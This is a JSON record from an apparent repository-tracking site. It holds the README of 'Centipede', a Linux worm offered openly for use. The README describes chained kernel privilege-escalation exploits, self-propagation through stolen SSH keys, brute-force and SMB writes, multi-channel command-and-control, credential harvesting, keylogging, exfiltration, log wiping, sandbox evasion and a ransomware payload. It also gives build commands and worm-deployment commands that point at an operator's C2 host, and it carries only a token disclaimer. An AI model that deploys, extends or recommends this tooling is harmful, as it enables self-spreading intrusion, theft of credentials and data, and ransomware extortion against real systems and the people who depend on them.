[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81725":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":14,"forks30d":14,"starsTrendScore":18,"compositeScore":19,"rankGlobal":9,"rankLanguage":9,"license":20,"archived":21,"fork":21,"defaultBranch":22,"hasWiki":23,"hasPages":21,"topics":24,"createdAt":9,"pushedAt":9,"updatedAt":25,"readmeContent":26,"aiSummary":27,"trendingCount":14,"starSnapshotCount":14,"syncStatus":28,"lastSyncTime":29,"discoverSource":30},81725,"Centipede","ekomsSavior\u002FCentipede","ekomsSavior","Self-replicating Linux worm with multi-layer C2 coms",null,"Go",44,12,35,0,1,4,9,3,48.24,"MIT License",false,"main",true,[],"2026-06-12 04:01:35","# Centipede | churchofmalware.org\n\nSelf-replicating Linux worm with multi-layer C2 communication, privilege escalation via kernel exploits, dark web command interface, Discord fallback, and a full payload suite for post-exploitation operations.\n\n**DISCLAIMER:** For authorized security testing and educational purposes only.\n\n\u003Cimg width=\"1536\" height=\"1024\" alt=\"worm2\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fb6dd6bf8-0ffa-4048-959a-08878a160b67\" \u002F>\n\n```\ncentipede\u002F\n├── cmd\u002F\n│   ├── centipede\u002F          # Worm implant binary\n│   └── c2d\u002F               # C2 server daemon\n├── internal\u002F\n│   ├── scanner\u002F           # Network discovery and WiFi scanning\n│   ├── exploiter\u002F         # Kernel exploit delivery and LPE chaining\n│   ├── replicator\u002F        # Self-propagation across SSH, WiFi, USB, HTTP, SMB, CVE\n│   ├── c2\u002F                # Multi-layer C2 client with fallback\n│   ├── payloads\u002F          # Post-exploitation payload suite (13 payloads)\n│   ├── sensor\u002F            # Environment fingerprinting and sandbox detection\n│   └── common\u002F            # Cryptographic and system utilities\n├── web\u002F                   # Dark web C2 dashboard\n│   ├── static\u002Fcss\u002F        # Dark theme stylesheet\n│   ├── static\u002Fjs\u002F         # Dashboard application logic\n│   └── templates\u002F         # HTML template\n├── Makefile\n└── README.md\n```\n\n## Architecture\n\n### Vulnerability Exploitation\n\nThe worm carries multiple kernel privilege escalation exploits that chain automatically:\n\n| Exploit | CVE | Kernel Range | Architectures | Notes |\n|---------|-----|--------------|---------------|-------|\n| **DirtyFrag** | CVE-2026-43284 + CVE-2026-43500 | 4.x - 6.x | x86_64, AARCH64 | IPsec ESP + RxRPC UAF chain. Original dirtyfrag implementation |\n| **Fragnesia** | CVE-2026-43284 + CVE-2026-43500 | 4.x - 6.x | x86_64, AARCH64 | Dirtyfrag variant with different memory layout and exploitation path. Covers cases where original dirtyfrag fails |\n| **Copy-Fail** | CVE-2026-31431 | 5.x - 6.x | x86_64, AARCH64 | AF_ALG\u002Falgif_aead page-cache write via splice primitive. Unified payload for both architectures (thanks Jakeswiz for extending architecture support for copyfail) |\n| **Dirty Pipe** | CVE-2022-0847 | 5.8 - 5.16 | x86_64, AARCH64 | Direct pipe write to overwrite read-only files |\n| **PwnKit** | CVE-2021-4034 | All | All | pkexec argument injection on any distribution with pkexec installed |\n| **GameOverlay** | CVE-2023-3269 | 5.x+ | x86_64, AARCH64 | Ubuntu overlayfs LPE |\n| **OverlayFS** | CVE-2023-2640 | 5.x+ | x86_64, AARCH64 | Additional Ubuntu overlayfs LPE vector |\n\nThe exploiter automatically detects kernel version, architecture (x86_64 or AARCH64), checks available kernel modules and capabilities, and chains exploits until root is obtained. DirtyFrag and Fragnesia run sequentially — if one fails due to kernel memory layout differences, the other may succeed. The unified Copy-Fail exploit includes both x86_64 and ARM64 payloads, making Centipede effective across cloud instances, Raspberry Pi botnets, and ARM-based servers.\n\n### CVE-Based Propagation\n\nOnce a host is compromised and root is achieved, the worm uses the same exploit chain as a propagation vector:\n\n1. Scanner discovers hosts on adjacent subnets (ARP sweep, TCP connect scan)\n2. For each discovered host with open ports, the replicator attempts to deliver the worm binary via:\n   - HTTP PUT upload (if port 80\u002F8080\u002F443 is open and accepts PUT)\n   - FTP anonymous upload (if port 21 allows anonymous write)\n   - SMB write to ADMIN$ or C$ shares (if port 445 is open)\n   - SSH key-based and password brute-force (if port 22 is open)\n3. Once the binary lands, it autonomously runs its LPE chain to escalate privileges\n4. The new compromised host continues scanning and spreading\n\nThis creates a self-sustaining propagation cycle independent of manual C2 intervention.\n\n### C2 Communication Layers\n\nFour fallback communication layers in priority order:\n\n1.  **WebSocket** — Encrypted bidirectional channel to C2 server. Primary communication method.\n2.  **DNS Tunnelling** — Commands and responses encoded in DNS TXT queries. Bypasses HTTP\u002FHTTPS filtering.\n3.  **Discord Bot** — C2 commands and results relayed through Discord via bot API.\n4.  **ICMP Tunnelling** — Data encoded in ICMP echo payload fields. Last-resort fallback.\n\nAll layers use end-to-end encryption with AES-GCM. The client automatically cycles through layers, falling back on connection failure and returning to higher-priority layers when connectivity is restored.\n\n### Self-Replication Vectors\n\n- **SSH Spread** — Harvests existing SSH keys from .ssh\u002F, known_hosts, and config. Copies binary and executes. Falls back to password brute-force with common credentials (root, admin, vagrant, ubuntu, pi, etc).\n- **WiFi Spread** — Scans for open WiFi networks using iw and nmcli, connects to discovered access points, and scans the new network for accessible hosts.\n- **USB Spread** — Detects writable removable media, copies binary with hidden attributes and autorun.inf.\n- **HTTP\u002FFTP\u002FSMB Spread** — Attempts worm delivery via HTTP PUT, FTP anonymous write, and SMB ADMIN$\u002FC$ shares.\n- **Lateral Movement** — SMB and WMI propagation for mixed environments.\n\n### C2 Server\n\nThe C2 daemon provides:\n- Dark web dashboard with real-time bot monitoring and activity feed\n- Live WebSocket streaming for bot event updates\n- Discord bot integration for command relay and result forwarding\n- RESTful API for programmatic control\n- Bot tagging and grouping for targeted command dispatch\n- Command queue with execution tracking\n\n### Payload Suite\n\n**DISCLAIMER:** For authorized security testing and educational purposes only.\n\n| Payload | Description |\n|---------|-------------|\n| reverse_shell | Spawn reverse or bind shell on target |\n| persist | Install via systemd, cron, .bashrc hooks, LD_PRELOAD |\n| harvest | Extract credentials: \u002Fetc\u002Fshadow, SSH keys, env vars, DB configs, cloud credentials, Kubernetes configs |\n| lateral | Inject SSH keys, scan known_hosts, discover orchestration infrastructure |\n| pivot | Enable IP forwarding, SOCKS proxy, NAT masquerade |\n| keylog | Capture keystrokes from input devices |\n| sniff | Capture network traffic via tcpdump |\n| enum | Full system enumeration: kernel, users, network, containers, cloud |\n| exfil | Exfiltrate binary and harvested data via HTTP POST |\n| wipe | Clear logs, history, journald, auditd, wtmp, randomize MAC |\n| selfdestruct | Remove all traces, delete binary, and exit |\n| ransomware | AES-256-GCM file encryption with operator-defined key. Key can be pre-set or auto-generated. Encrypts targeted file types across specified directories |\n| ransomware_decrypt | Decrypt .centipede files using the same key used for encryption. Restores original files and removes ransom notes |\n\n### Ransomware Payload\n\n** Disclaimer extremly destructive!** must have authorization before using. proceed carefully.\n\nThe ransomware payload provides operator-controlled file encryption:\n\n- **Key Management**: Operator provides a 32-byte (64 hex char) key via the `key` argument. If no key is provided, one is auto-generated and returned.\n- **File Selection**: Encrypts files by extension (documents, media, archives, databases, certificates, configs, source code, cloud configs). Targets directories specified in `dirs` argument (defaults to \u002Fhome, \u002Froot, \u002Fvar\u002Fwww, \u002Fetc, \u002Fopt, \u002Fsrv).\n- **Encryption**: AES-256-GCM per file with unique nonce. Encrypted files get .centipede extension appended.\n- **Ransom Note**: Written to each targeted directory root.\n- **Decryption**: ransomware_decrypt payload with the same key restores all files.\n- **Skip Protection**: Already-encrypted .centipede files are skipped.\n\nUsage via C2:\n```\n> ransomware key=\"\" dirs=\"\u002Fhome,\u002Froot\"\n> ransomware key=\"a1b2c3d4...\" dirs=\"\u002Fvar\u002Fwww\"\n> ransomware_decrypt key=\"a1b2c3d4...\"\n```\n\n## Quick Start\n\n### Build\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002FekomsSavior\u002FCentipede\ncd Centipede\nmake build\n```\n\n### Start C2 Server\n\n```\n.\u002Fbin\u002Fc2d -addr :8443\n```\n\nWith Discord relay:\n\n```\n.\u002Fbin\u002Fc2d -addr :8443 -discord-token \"YOUR_BOT_TOKEN\" -discord-channel \"CHANNEL_ID\"\n```\n\n### Deploy Worm\n\nWith direct C2 endpoint:\n\n```\n.\u002Fbin\u002Fcentipede -c2 ws:\u002F\u002FYOUR_C2_IP:8443\u002Fws\u002Fbot\n```\n\nWith all fallbacks:\n\n```\n.\u002Fbin\u002Fcentipede \\\n    -c2 ws:\u002F\u002FYOUR_C2_IP:8443\u002Fws\u002Fbot \\\n    -c2-dns c2.yourdomain.com \\\n    -c2-discord-token \"TOKEN\" \\\n    -c2-discord-channel \"CHANNEL_ID\" \\\n    -c2-icmp YOUR_C2_IP\n```\n\n## C2 Dashboard\n\nAccess the dark web dashboard at `http:\u002F\u002FYOUR_C2_IP:8443\u002F`. The interface provides:\n\n- Real-time bot activity feed with live WebSocket streaming\n- Command dispatch to individual bots, tagged groups, or all bots\n- Payload selection and deployment with pre-configured options\n- Exploit status monitoring with CVE details and kernel ranges\n- Bot tagging and management\n\n## Configuration\n\nConfiguration file (`\u002Fetc\u002Fcentipede.conf`):\n\n```json\n{\n    \"c2_endpoint\": \"ws:\u002F\u002Fc2.example.com:8443\u002Fws\u002Fbot\",\n    \"c2_dns_domain\": \"c2.example.com\",\n    \"c2_discord_token\": \"YOUR_TOKEN\",\n    \"c2_discord_channel\": \"CHANNEL_ID\",\n    \"c2_icmp_target\": \"c2.example.com\",\n    \"scan_interval\": 300,\n    \"spread_interval\": 300,\n    \"exploit\": true,\n    \"replication\": true,\n    \"masquerade\": true\n}\n```\n\nCommand-line flags override config file values. The config file is read from \u002Fetc\u002Fcentipede.conf by default.\n\n## Exploit Chain\n\n**DISCLAIMER:** For authorized security testing and educational purposes only.\n\nThe exploit chain executes in order until root is obtained:\n\n1. **DirtyFrag** (CVE-2026-43284 + CVE-2026-43500) — Kernel 4.x through 6.x. IPsec ESP + RxRPC UAF chain. Primary exploitation path.\n2. **Fragnesia** (CVE-2026-43284 + CVE-2026-43500) — Kernel 4.x through 6.x. Dirtyfrag variant with different memory layout. Attempts when DirtyFrag fails due to kernel memory layout differences.\n3. **Copy-Fail** (CVE-2026-31431) — Kernel 5.x through 6.x with algif_aead module. Unified payload for x86_64 and AARCH64. Uses AF_ALG + splice primitive to corrupt \u002Fusr\u002Fbin\u002Fsu.\n4. **Dirty Pipe** (CVE-2022-0847) — Kernel 5.8 through 5.16.\n5. **PwnKit** (CVE-2021-4034) — Any distribution with pkexec installed.\n6. **GameOverlay** (CVE-2023-3269) — Ubuntu kernels with overlayfs.\n7. **OverlayFS** (CVE-2023-2640) — Ubuntu kernels with overlayfs.\n\nEach exploit checks its preconditions (module loaded, file exists, kernel version range, architecture compatibility) before attempting. Failures are non-fatal and the chain continues.\n\n## Detection Evasion\n\n- Sandbox environment detection before execution (CPU count, \u002Fproc\u002Fcpuinfo content)\n- Process name masquerading as kernel threads ([kworker\u002Fu256+0], [jbd2\u002Fdm-0-8], etc.)\n- Encrypted configuration blobs (no hardcoded strings in binary)\n- Forensic cleanup payload wipes shell history, system logs, journald, auditd, and login records\n- MAC address randomization on compromised hosts (root only)\n- Configurable sleep intervals with jitter\n\n## Credits\n\nBuilt by **ek0ms**\n\nSpecial thanks to the exploit research community, especially JakeSwiz https:\u002F\u002Fgithub.com\u002F0xXyc\u002F (0xXyc) for the AARCH64 port of Copy-Fail and contributions to the Fragnesia dirtyfrag variant- https:\u002F\u002Fgithub.com\u002Fv12-security\u002Fpocs\u002Ftree\u002Fmain\u002Ffragnesia\n","Centipede是一个自复制的Linux蠕虫，具备多层命令与控制通信能力。该项目使用Go语言编写，核心功能包括通过内核漏洞进行提权、多层次的C2通信机制（含暗网命令界面和Discord备用通道）、以及一套完整的后渗透操作载荷套件。它能够自动检测目标环境并利用一系列已知漏洞获取最高权限，适用于授权的安全测试和教育目的。请注意，该项目仅供合法安全研究和学习使用。",2,"2026-06-11 04:06:09","CREATED_QUERY"]